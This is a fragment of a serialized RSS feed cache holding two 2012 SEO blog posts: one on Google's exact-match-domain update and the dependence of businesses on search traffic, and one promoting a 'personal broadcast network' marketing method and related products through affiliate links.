Ranked?</h2>\n<p>After perfecting your <a href=\"http://www.seodesignsolutions.com/blog/seo/is-your-on-page-seo-strong-enough/\">on page SEO</a>, a large portion of the SEO process is based on developing sufficient website authority through exceeding the <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">algorithmic tipping point</a> for on page content (with the quality of that content now being equally as important as the volume and frequency).</p>\n<p>Essentially, since articles don’t write themselves, you’ll need an in-house <strong>subject matter expert</strong> or a knowledgeable writer or team of writers if you intend on developing the authority site model.  Instead of building and relying on backlinks, create content that is worthy to garner its own links or leverage the on page authority and trust your website has to catapult past less authoritative websites in your way.</p>\n<p>Keep in mind, developing authority is a lengthy process that requires commitment and dedication to quality and consistency (always providing users’ value instead of rehashing vague fodder). Also remember that nothing happens overnight with SEO (most sustainable results can take months), in short, it’s all about <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/you-reap-what-you-sow-with-organic-seo/\">planting and sowing</a> the results over time.</p>\n<p>If your content is stellar, people will share it (if you give them a nudge) and the social sharing has tremendous weight in the new algorithm (to expedite authority for the page and hence the site).</p>\n<p>If you plan on using the three strategies outlined above, then SEO is important. Otherwise, you may have to seek <a href=\"http://www.networkedblogs.com/\">alternative traffic sources</a> to offset dependency on Google’s organic traffic as a life vein for your business.</p>\n<h2>SEO Bizarro World</h2>\n<p>Is the epic battle of giants affecting your business?</p>\n<p style=\"text-align: center;\">\n<div id=\"attachment_9150\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><img class=\"size-full wp-image-9150\" title=\"6a00d8345158e369e200e552abeda58834-500wi\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/6a00d8345158e369e200e552abeda58834-500wi.jpg\" alt=\"\" width=\"500\" height=\"377\" /><p class=\"wp-caption-text\">Me Facebook Beat You Google</p></div>\n<p>Image courtesy of (<a href=\"http://comiccoverage.typepad.com/comic_coverage/2008/06/cover-to-cover-action-comics-1.html\">comic coverage</a>).</p>\n<p>In this Bizarro world where Google wants to be more social and Facebook is talking about creating their own search engine, <em>be worried, be very worried</em> since core competencies exist for a reason.</p>\n<p>The rise and fall of search results for webmasters may result in a requiem for search engines, since consumers can easily <strong>“jump ship”</strong> and find the next big thing and find new ways to <strong>get what they want</strong>.</p>\n<p>Let’s just say that backlash is an understatement and when the search bubble bursts (and it will), I wouldn’t want to be in aisle 5 (if you catch my drift). I’m sure Myspace, Digg and other once popular websites never saw it coming as they were displaced by a fickle (or bored) user base or lots of savvy emerging competitors who introduced something equally viable to woo their users away. The end result,  their traffic sources (repeat visitors) dried up (like dust in the wind).</p>\n<p>While search does not exclusively belong to Google, quality matters and the importance and credibility of organic results is what delivers the most traffic from repeat visitors.</p>\n<p>If the quality and relevancy suffers, the site loses its value. In my opinion, that is how I view Google’s search results, quite simply, <em>they have filtered so many things that good sites along with the bad have been suppressed </em>(which translates to a poor user experience). I find myself having to refine my searches more and more, since the results on the first page are NOT what I am looking for and often are so far off topic I am amazed how it surfaced.</p>\n<h2>Don&#8217;t Let Bad Search Happen to You!</h2>\n<p>So, not to go all <strong>“fist of goodness”</strong> on you here (props to direct TV vs. cable ads) but, this is one thing for both Google and users alike to keep in mind.</p>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"281\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/Lo2hyWYOV6g?version=3&amp;hl=en_US\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"281\" src=\"http://www.youtube.com/v/Lo2hyWYOV6g?version=3&amp;hl=en_US\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>When people lose confidence in search engines, the less people search, the less people search, the less valuable the paid ads become, the less valuable the paid ads become the more a search engine tries to justify its position to those paying for ads, the more a search engine tries to justify its position for those paying for ads, the more changes, penalties or adjustments are enforced through “the index vs. the content in the index” which affects its organic user base, the more changes, penalties or adjustments are made that affect the organic user base, the less users will depend on search engines.</p>\n<p>Don’t let bad search happen to you, don’t rely strictly on search engines…</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=ryL6RtTC0UA:Dr3friZCmoo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/ryL6RtTC0UA\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:339:\"If you’re a webmaster and have been impacted (penalized, lost traffic or have been caught in an algorithmic filter) from Google, the conclusion is obvious that Google isn’t trying to win a popularity contests with their user base lately. First, it was the dawn of the web shattering Panda update (a content classifier designed to [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"2\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:108:\"http://www.seodesignsolutions.com/blog/seo/the-google-emd-update-don%e2%80%99t-let-bad-search-happen-to-you/\";}s:7:\"summary\";s:339:\"If you’re a webmaster and have been impacted (penalized, lost traffic or have been caught in an algorithmic filter) from Google, the conclusion is obvious that Google isn’t trying to win a popularity contests with their user base lately. First, it was the dawn of the web shattering Panda update (a content classifier designed to [...]\";s:12:\"atom_content\";s:14843:\"<p>If you’re a webmaster and have been impacted (penalized, lost traffic or have been caught in an algorithmic filter) from Google, the conclusion is obvious that Google isn’t trying to win a popularity contests with their user base lately.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo/the-google-emd-update-don%E2%80%99t-let-bad-search-happen-to-you/\"><img class=\"aligncenter size-full wp-image-9149\" title=\"dont-let-bad-search-happen-to-you\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/dont-let-bad-search-happen-to-you.jpg\" alt=\"\" width=\"500\" height=\"274\" /></a></p>\n<p>First, it was the dawn of the web shattering <strong>Panda update</strong> (a content classifier designed to remove low quality web pages, websites that copied from other websites or weak internal pages with minimal value) from their index,  second, the backlink witch hunt / <strong>Penguin update</strong> (designed to demote websites from ranking highly which have <em>off-topic</em> or inbound links from low quality websites) and now <strong>the EMD update</strong> (the <strong>exact match domain update</strong>) which demotes websites which have exact match domains from easily ranking for their core keywords.<span id=\"more-9145\"></span></p>\n<h2>What&#8217;s an EMD?</h2>\n<p>While most savvy SEO’s or online marketing  types understand the lingo, for those unfamiliar with the terminology,  exact match domains are websites such as babycribs.com which <em>in the past</em> would rank rather easily for the key phrase “baby cribs”.</p>\n<p>Exact match domains are typically highly sought from <strong>“Domaineers”</strong> (individuals who purchase, collect, monetize or sell domains) due to their ability to (1) rank highly in search engines with a fraction of the effort by the virtue of the domain name or (2) monetize those sites due to the commercial viability (since consumers easily commit the domain name to memory); that is, until <strong>the Google EMD update</strong>.</p>\n<p>Before this update, there was a glaring loophole in search engines (Google in particular) which allowed exact match domains to rank uncontested with minimal SEO (sometimes within days of being created). So, instead of spending money on SEO, backlinks or promotion, businesses would often spend the money on acquiring a top level exact match domain.</p>\n<p>The reason is simple, a website in the #1 position for an organic search phrase can garner 42-70% of the click through traffic for a keyword (compared to 2% in the number 10 position on the page); and since 7 out of 10 people typically click the organic results instead of paid (PPC) results, this is a major blow if dethroned from the #1 position or top 3 organic positions on the page.</p>\n<h2>Minor or Major Change?</h2>\n<p>On September 28<sup>th</sup>, avid SEO personality <a href=\"http://www.seroundtable.com/google-emd-update-15776.html\">Barry Schwartz</a> from <strong>SEO Round Table</strong> gleaned a tidbit of relevant info on the EMD update. Apparently, in a recent tweet by Matt Cutts (head of Google’s Web Spam Team) he states – “<em>Minor weather report: small upcoming Google algo change will reduce low-quality &#8220;exact-match&#8221; domains in search results.</em>”</p>\n<p>Cutts later tweeted – <em>“New exact-match domain (EMD) algo affects 0.6% of English-US queries to a noticeable degree. Unrelated to Panda/Penguin”.</em></p>\n<p>Now your first thought, 0.6 that’s not so bad right? That all depends on the <a href=\"http://www.theatlantic.com/technology/archive/2012/09/google-news-at-10-how-the-algorithm-won-over-the-news-industry/262641/\">sheer volume</a> of total English-US queries, and, if that number is <strong>theoretically</strong> 100,000,000,000 queries per day (100 billion), that represents 60 million potential queries <strong>affected daily</strong> by this change.</p>\n<p>There’s <strong><em>nothing minor about this</em></strong> or any other algorithm, infrastructure or classifier change in a search engines’ index, more specifically, this is the equivalent of Hurricane Katrina to a small business or website <em>not fortified by alternative traffic or citation sources</em>.</p>\n<p>While most webmasters may not own an EMD or rely strictly on the ranking power of an exact match domain alone; if you do own a full or partial hyphenated EMD and your website’s major keywords disappear, your revenue is and business model are inevitably impacted instantly.</p>\n<p>As far as chain reactions go, once rankings dip, your cash flow could tank or you could inevitably go out of business, unless you have a plan B for traffic (particularly in this economy).</p>\n<p>Based on the inquiries we have received for the past 6 months from companies in need of solutions to Google changes, most webmasters (business owners, individuals and affiliates alike), do not have a plan B and are <strong>puzzled, frustrated, agitated or struggling</strong> to determine <em>what happened to their traffic</em>, <em>what <strong>they did</strong> or <strong>did not do</strong></em> and, most of all <strong>why now</strong>, when things were just fine before the latest <span style=\"text-decoration: line-through;\">monkey wrench</span> tweak. Was it a competitor throwing a batch of bad links from negative SEO, or did they simply trip a filter and get hit with a penalty?</p>\n<p>In either case, it’s dangerous for webmasters to blindly assume that once you attain a high ranking position for your primary keyword (exact match domain or otherwise) that your website won’t be churned off the page (from an update, filter or algorithm change).</p>\n<p>Often, <strong>it’s not even your site being penalized</strong>; it’s the other sites that linked to yours that took the hit (and your website is no longer buoyant in the search results as a result). Keep in mind that when they purge their index many of the sites that were holding other sites up (by virtue of their citation/links) have been caught (essentially algorithmically neutered) from passing link flow to other websites.</p>\n<p>Since citation leaves a footprint, if your website happened to receive sustenance from an algorithmically compromised website, then, like a chain of dominos, the link-flow dropped off. Essentially, you start from zero again and fall to the back of the line (rolled back 5-10 pages in the search results) or sometimes worse (not ranking at all for the keyword).</p>\n<p>The point is, there are no guarantees when it comes to how search engines tally links, popularity, relevance and value, it’s merely their perception of <strong>what they think their users want</strong>. What Google forgets is, it’s those same users <em>who own websites and have become dependent on that traffic for their business</em> who are getting thrown under the bus and have no idea why.</p>\n<p>This process has gone on for years and quite frankly, people are getting tired of running the gauntlet and trying to appease their new rules (starting with things like adding nofollow attributes to all outbound links) because Google couldn’t detect link intent i.e. <strong>“paid links”</strong> with their algorithm and wanted to impose using nofollow to webmasters to add nofollow attributes to all outbound links (using the fear of penalties) as a consequence.</p>\n<p>Over time, Google just kept a plethora of updates coming (in the name or relevancy) from the Florida Update, the Big Daddy Update, the May Day Update, The Vince Update, the Panda Update, Penguin Update, etc., <strong>enough is enough already</strong>.</p>\n<h2>Is SEO Still Important?</h2>\n<p>Is SEO still important? Yes and No!</p>\n<p>SEO is important if you have (1) implemented conversion optimization first, so that regardless of <strong>where your traffic emanates from</strong>, it will result in increased ROI (return on investment)  via more subscriptions, social engagement (viral traffic) or sales and (2) If you have the budget and / or staff to afford implementing the often tedious work associated with SEO.</p>\n<p>SEO is NOT important if want to spend more money on Television, Radio, Newspaper ads, Pay-Per-Click, have a strong offline marketing push. While Google&#8217;s claim for making these changes is relevancy, their motivation has transcended &#8220;building the best search engine&#8221; and has become something far more transparent (scrub <span style=\"text-decoration: line-through;\">compromise</span> the organic search    results and focus on paid search which provides approximately 98% of all profits for Google).</p>\n<h2>How Do You Get Ranked?</h2>\n<p>After perfecting your <a href=\"http://www.seodesignsolutions.com/blog/seo/is-your-on-page-seo-strong-enough/\">on page SEO</a>, a large portion of the SEO process is based on developing sufficient website authority through exceeding the <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">algorithmic tipping point</a> for on page content (with the quality of that content now being equally as important as the volume and frequency).</p>\n<p>Essentially, since articles don’t write themselves, you’ll need an in-house <strong>subject matter expert</strong> or a knowledgeable writer or team of writers if you intend on developing the authority site model.  Instead of building and relying on backlinks, create content that is worthy to garner its own links or leverage the on page authority and trust your website has to catapult past less authoritative websites in your way.</p>\n<p>Keep in mind, developing authority is a lengthy process that requires commitment and dedication to quality and consistency (always providing users’ value instead of rehashing vague fodder). Also remember that nothing happens overnight with SEO (most sustainable results can take months), in short, it’s all about <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/you-reap-what-you-sow-with-organic-seo/\">planting and sowing</a> the results over time.</p>\n<p>If your content is stellar, people will share it (if you give them a nudge) and the social sharing has tremendous weight in the new algorithm (to expedite authority for the page and hence the site).</p>\n<p>If you plan on using the three strategies outlined above, then SEO is important. Otherwise, you may have to seek <a href=\"http://www.networkedblogs.com/\">alternative traffic sources</a> to offset dependency on Google’s organic traffic as a life vein for your business.</p>\n<h2>SEO Bizarro World</h2>\n<p>Is the epic battle of giants affecting your business?</p>\n<p style=\"text-align: center;\">\n<div id=\"attachment_9150\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><img class=\"size-full wp-image-9150\" title=\"6a00d8345158e369e200e552abeda58834-500wi\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/10/6a00d8345158e369e200e552abeda58834-500wi.jpg\" alt=\"\" width=\"500\" height=\"377\" /><p class=\"wp-caption-text\">Me Facebook Beat You Google</p></div>\n<p>Image courtesy of (<a href=\"http://comiccoverage.typepad.com/comic_coverage/2008/06/cover-to-cover-action-comics-1.html\">comic coverage</a>).</p>\n<p>In this Bizarro world where Google wants to be more social and Facebook is talking about creating their own search engine, <em>be worried, be very worried</em> since core competencies exist for a reason.</p>\n<p>The rise and fall of search results for webmasters may result in a requiem for search engines, since consumers can easily <strong>“jump ship”</strong> and find the next big thing and find new ways to <strong>get what they want</strong>.</p>\n<p>Let’s just say that backlash is an understatement and when the search bubble bursts (and it will), I wouldn’t want to be in aisle 5 (if you catch my drift). I’m sure Myspace, Digg and other once popular websites never saw it coming as they were displaced by a fickle (or bored) user base or lots of savvy emerging competitors who introduced something equally viable to woo their users away. The end result,  their traffic sources (repeat visitors) dried up (like dust in the wind).</p>\n<p>While search does not exclusively belong to Google, quality matters and the importance and credibility of organic results is what delivers the most traffic from repeat visitors.</p>\n<p>If the quality and relevancy suffers, the site loses its value. In my opinion, that is how I view Google’s search results, quite simply, <em>they have filtered so many things that good sites along with the bad have been suppressed </em>(which translates to a poor user experience). I find myself having to refine my searches more and more, since the results on the first page are NOT what I am looking for and often are so far off topic I am amazed how it surfaced.</p>\n<h2>Don&#8217;t Let Bad Search Happen to You!</h2>\n<p>So, not to go all <strong>“fist of goodness”</strong> on you here (props to direct TV vs. cable ads) but, this is one thing for both Google and users alike to keep in mind.</p>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"281\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/Lo2hyWYOV6g?version=3&amp;hl=en_US\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"281\" src=\"http://www.youtube.com/v/Lo2hyWYOV6g?version=3&amp;hl=en_US\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>When people lose confidence in search engines, the less people search, the less people search, the less valuable the paid ads become, the less valuable the paid ads become the more a search engine tries to justify its position to those paying for ads, the more a search engine tries to justify its position for those paying for ads, the more changes, penalties or adjustments are enforced through “the index vs. the content in the index” which affects its organic user base, the more changes, penalties or adjustments are made that affect the organic user base, the less users will depend on search engines.</p>\n<p>Don’t let bad search happen to you, don’t rely strictly on search engines…</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=ryL6RtTC0UA:Dr3friZCmoo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/ryL6RtTC0UA\" height=\"1\" width=\"1\"/>\";}i:14;a:12:{s:5:\"title\";s:64:\"SEO Overhauled: It’s not about links, it’s about promotions!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/0o45EW4lGDs/\";s:8:\"category\";s:98:\"SEO VideosDWS 4.0 is LiveIs SEO Dead?Online Marketing and PromotionOnline PromotionsSEO Overhauled\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Tue, 24 Jul 2012 01:42:17 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9122\";s:7:\"content\";a:1:{s:7:\"encoded\";s:18883:\"<p>Rather than overreact to rankings alone and scream the sky is falling, for the past 15 months we have been quietly testing new strategies that can withstand the likes of <strong>Panda</strong> (<em>a quality control classifier</em>) and <strong>Penguin</strong> (<em>a thematic link sniffing filter</em>) that demotes websites with excessive inbound anchor text  i.e. <strong>“unnatural”</strong> link signals.</p>\n<div id=\"attachment_9123\" class=\"wp-caption aligncenter\" style=\"width: 509px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-overhauled-it%E2%80%99s-not-about-links-it%E2%80%99s-about-promotions/\"><img class=\"size-full wp-image-9123\" title=\"SEO-Overhaul\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/07/SEO-Overhaul.jpg\" alt=\"SEO Overhauled\" width=\"499\" height=\"518\" /></a><p class=\"wp-caption-text\">It&#39;s Not About Links, It&#39;s About Promotions</p></div>\n<p>Keep in mind suspicious or contrived <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/seo-rankings-trust-and-relevance-signals/\">link signals</a> could imply a wide variety of possibilities, such as:</p>\n<ul>\n<li>Unnatural <a href=\"http://www.seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">link velocity</a> (building or losing links too fast).</li>\n<li>Excessive anchor text, i.e. a high percentage of the same or similar anchor-text.</li>\n<li> Links from mixed-fruit / atypical websites that lack genuine/natural signals such as (1) supporting / thematic inbound links (2) traffic and engagement or (3) social signals (which is why many generic link networks failed to get past Penguin).</li>\n</ul>\n<p><span id=\"more-9122\"></span><br />\nIt&#8217;s no secret that two Google algorithm changes (<strong>Penguin</strong> and <strong>Panda</strong>) nearly eradicated SEO as we knew it, however,one thing is certain about SEO, the fact that it&#8217;s always adapting or in a state of flux.</p>\n<p>Adaptation in this instance implies (a) understanding the entire keyword climate for all educational or promotional key phrases that consumers are using while progressing through the sales cycle (b) using that language strategically in titles, on page content, <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/sales-page/silo-plugin-sales-page/\">in your promotions</a> (content, images and links) and (c) in the social graph as hooks <strong>that all drive traffic back to your branded promotional properties</strong> or your <strong>primary website. </strong>Expanding this process systemically facilitates perpetual conversions.</p>\n<h3>Is SEO Dead As We Know It?</h3>\n<p>Have the rules changed? Absolutely! Is SEO dead? <em>In its previous embodiment</em>, to a large extent, yes!  So, the bottom line is (1) what now? And (2) <strong>how do I broadcast my brand and my message</strong> instead of merely churning mediocre content or fiddling with low quality backlinks?</p>\n<p>Watch the videos below and learn how to quickly create your own thematically relevant <strong>“personal broadcast network”</strong> using WordPress, <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/sales-page/silo-plugin-sales-page/\">DWS</a> and our plugin amply named “<a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/sales-page/silo-plugin-sales-page/\">The Silo Blog Builder</a>”. Afterwards, make sure to  watch the webinar (further down the page) for an in depth overview of the new DWS 4.0 online promotion paradigm.</p>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"281\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/EB5qMffmAKQ?version=3&amp;hl=en_US\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"281\" src=\"http://www.youtube.com/v/EB5qMffmAKQ?version=3&amp;hl=en_US\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Put simply, if your primary website lacks traffic or sales, then no amount of outdated SEO (circa. the Google Penguin update April 2012) will make a difference. It’s not just about rankings; it’s about how scalable your traffic sources are and how adept you are in extracting <strong>relevant traffic on demand</strong>.</p>\n<h3>Spoiler Alert Regarding Blog Networks!!!</h3>\n<p>Do mixed-fruit blog networks still work? No! or at least until a filter weeds them out. However, <strong>theme relevant networks </strong>still pass ranking factor (and can serve as a branded broadcast beacon for extended promotions), which means a link  from <strong>site B</strong> to <strong>site A</strong> must be <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-video-how-to-properly-silo-your-website/\">theme relevant</a> (have the same topic) and use the appropriate anchor text along  with related synonyms (a.k.a. the DNA Braid) to avoid overoptimization filters or being smacked / deindexed.</p>\n<p>If you are creating a beacon/site, it also helps to create stellar content (worthy of social media) and syndicate that content (to build links to your links) and ensure the longevity of your <strong>&#8220;broadcast channel&#8221;</strong>.</p>\n<p>The new paradigm suggests to look past rankings and think of <strong>each site or promotional property</strong> as a beacon, broadcasting YOU (your brand), All the Time, Right NOW!</p>\n<h3>It’s Not About Links, It’s About Promotions!</h3>\n<p>In a competitive online environment, using obsolete legacy metrics (such as search engine rankings and only using one website to compete) is defunct as a viable strategy.</p>\n<p>The imperative <strong>metrics</strong> to consider are (1) how scalable are your personal broadcast networks? and (2) how theme relevant and extensive are your syndication sequences for generating <strong>traffic</strong> which is <em>the only metric that matters</em>.</p>\n<p>Learn <strong>how to create a proper promotional campaign</strong>, including:</p>\n<ul>\n<li>which keywords to use</li>\n<li>how much those keywords are worth to your business</li>\n<li>how long it will take to get ranked</li>\n<li>how to use website silo architecture  to build your website</li>\n<li>which content , synonyms and type of promotions you need to drive traffic</li>\n<li>knowing which social media sites, RSS directories, video sites or press release<br />\nsources to use and having a project management suite to coordinate your team.</li>\n</ul>\n<h3>Take The Next Step: Watch the <a href=\"http://www.networkempire.com/dap/a/?a=152\">DWS 4.0</a> Webinar!</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"375\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param value=\"http://www.youtube.com/v/txB97iCsUmU?version=3&amp;hl=en_US\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/txB97iCsUmU?version=3&amp;hl=en_US\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"375\" src=\"http://www.youtube.com/v/txB97iCsUmU?version=3&amp;hl=en_US\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Sure, on page SEO is still important, however quality content and engagement is a metric you simply can’t afford to overlook, and about that “<em>off page SEO thing</em>”, yeah, <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-avoid-seo-over-optimization/\">over optimization</a> is real, but just keep in mind, now, it’s not just about links, it’s about promotions.</p>\n<p>Allow me to explain!</p>\n<p><strong>People Hemmed up in Panda and Penguin Algorithms Typically:</strong></p>\n<ol>\n<li>Got a bit too greedy with off page SEO (link metrics) and churned out as much content to build links as possible (without thinking of quality).As a result, Google struck back with their quality control algorithms which comprised stricter filters, classifiers and relevance signals, (i.e. social signals, engagement time, bounce rate, <em>thematic relevance of the link graph</em> for the target and refering site) and 200 other <strong>fancy smancy words</strong> that translate to <strong>“if your website sucks, then good luck finding it in their SERPs&#8221;</strong>).</li>\n<li>People hemmed up in the Panda / Penguin Algo had a tendency to get a bit too lose with quality control on their promotional content and found out that <strong>regardless of the traffic source</strong> – you <strong>MUST</strong> have something useful to contribute.Otherwise, your content will simply be skimmed over for something useful and ignored vs. starting with a solid foundation of engaging contnent and promotional content to begin with.</li>\n<li>Websites drastically afftected by Panda or Penguin often relied too heavily on one metric (such as links)  because it was working and thus became complacent in regard to seeking viable alternatives or finding new ways to reach their ideal consumer.</li>\n</ol>\n<p>Remember, Google is merely one traffic source; a very popular one, but not  every consumer uses or purchases exclusively through their link/traffic/ sales funnel. This means, there are a myriad of <strong>alternate traffic funnels</strong> that you can leverage systematically to reach your audience contextually, socially or otherwise.</p>\n<p>A consumer’s impulse to purchase is either active or dormant, yet if that dormant spark of desire is enlivened through curiosity, a clever headline, utility or impulse, then conversion is merely a few clicks away. Conversions (making a sale) is not exclusive to Google, in fact, conversions can occur from a multitude of sources.</p>\n<p>For example, a conversion could occur from:</p>\n<ul>\n<li>playing a game online and being lured by an enticing banner</li>\n<li>during social interactions on Facebook (or other social platforms) from banners or contextual links<br />\nbeing lured from teaser “check this out” social media content or images in their various clever iterations</li>\n<li>from reading articles and clicking the contextual links (after social proof is established).</li>\n</ul>\n<p>This process, setting up the sales funnel should not be left to happenstance alone. In fact, when we map this phase of a campaign for a new client, we use what <a href=\"http://www.youtube.com/watch?v=jsS8Zppd_q4\">Russell Wright</a> brilliantly coined as the <strong>IS-DNA</strong>. The letter &#8220;I&#8221; in &#8220;IS-DNA&#8221; stands for Invention/Innovation/Industry and the &#8220;S&#8221; stands for &#8220;Solution&#8221;.</p>\n<div id=\"attachment_9124\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><a href=\"http://www.networkempire.com/dap/a/?a=152\"><img class=\"size-full wp-image-9124\" title=\"Network-Empire-DWS-DNA\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/07/Network-Empire-DWS-DNA.jpg\" alt=\"Network-Empire-DWS-DNA\" width=\"500\" height=\"375\" /></a><p class=\"wp-caption-text\">Understanding Promotion as a Stackable Process</p></div>\n<p>When we speak of &#8220;DNA&#8221; in our material we simply mean &#8220;components of&#8221; or <strong>&#8220;building blocks of&#8221;</strong>.</p>\n<p>So &#8220;IS-DNA&#8221; translates into the &#8220;building blocks&#8221; of your innovation or invention that you have provided to your industry.</p>\n<p>The purpose of the IS-DNA process is to align your market&#8217;s FAQs (frequently asked questions) with your market&#8217;s SAQ&#8217;s (should ask questions) by drilling down and getting to <strong>&#8220;the questions behind the questions&#8221;</strong>, or <strong>&#8220;the pain behind the questions</strong>&#8221; which will be used later to create highly converting articles and videos using the PAM (painkiller article method).</p>\n<p>Remember that we are giving you a <a href=\"http://www.networkempire.com/dap/a/?a=152\">highly profitable stack-able business process</a>, and the IS-DNA may very well be the most important part of the entire process, because it is the BASE of your PLMM (Perpetual Lead Magnet Machine) System and Pyramid. <strong>Get this wrong</strong> and you may end up <strong>using the wrong language to talk to the wrong market!</strong></p>\n<p>The IS-DNA set&#8217;s the stage by creating a matrix of market questions in order to help you select the most effective language that can reach your target market because you (and your team) will truly understand the problems and pains that have been solved for them by your product or service (innovation or invention).</p>\n<p>Once you have mapped out <strong>“the pain in the market”</strong>, you can tactfully craft “<a href=\"http://www.theme-zoom.com/krakken12/pdf/the-4-million-dollar-market-research-questions.pdf\">pain killers</a>” (PDF Download) in your content, videos, social media and/or promotions to transcend <em>traffic-dependency</em> (such as Google) to devour your entire market. To thrive, you’ll have to escape the grasp of one simple traffic funnel to flourish.</p>\n<p>Whenever you rely solely on a <strong>“<em>for profit business</em>”</strong>, <em>that business</em> (potentially) has the ability to <strong>endanger your bottom line</strong>. Just as the “<em>eggs in one basket</em>” adage comes to mind, the question is, are you still in Google’s pocket? Or have you considered a long-term contingent strategy diverse enough to flourish (if Google or your most lucrative traffic source simply stopped providing traffic?).</p>\n<p>To avoid putting your business at risk you must hedge your primary property with branded social media and third-party websites (just in case). Consider Google’s last algorithm change Penguin. Many who were unprepared suffered, as their once profitable websites spigot of traffic got shut off, <strong>forcing them to find alternatives</strong> &#8211; rather than diverisfying and being prepared (as if Google never existed) in the first place.</p>\n<p>In order to do that, you must change the way you think, which means instead of thinking about <strong>backlinks and on page optimization</strong>, replace on page SEO with “<em>genuinely engaging content</em>” and replace backlinks with the idea of “<em>broadcasts</em>” and “<em>promotions</em>” and broadcasting your brand (across hundreds of traffic-bearing sources) using a <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/testimonials/\">stackable / repeatable process</a> that YOU control.</p>\n<p>Remember, backlinks are merely a byproduct of promotions if you don’t have anything worthy of sending traffic to, then visitors will simply bounce in search of better content; so, there is no need to put the cart before the horse.</p>\n<div id=\"attachment_9127\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\"><img class=\"size-full wp-image-9127\" title=\"call-to-action\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/07/call-to-action.jpg\" alt=\"Call to Action\" width=\"400\" height=\"486\" /></a><p class=\"wp-caption-text\">Does Your Content Have a Clear Call to Action?</p></div>\n<p>After seeing the image above, did you want to buy something? 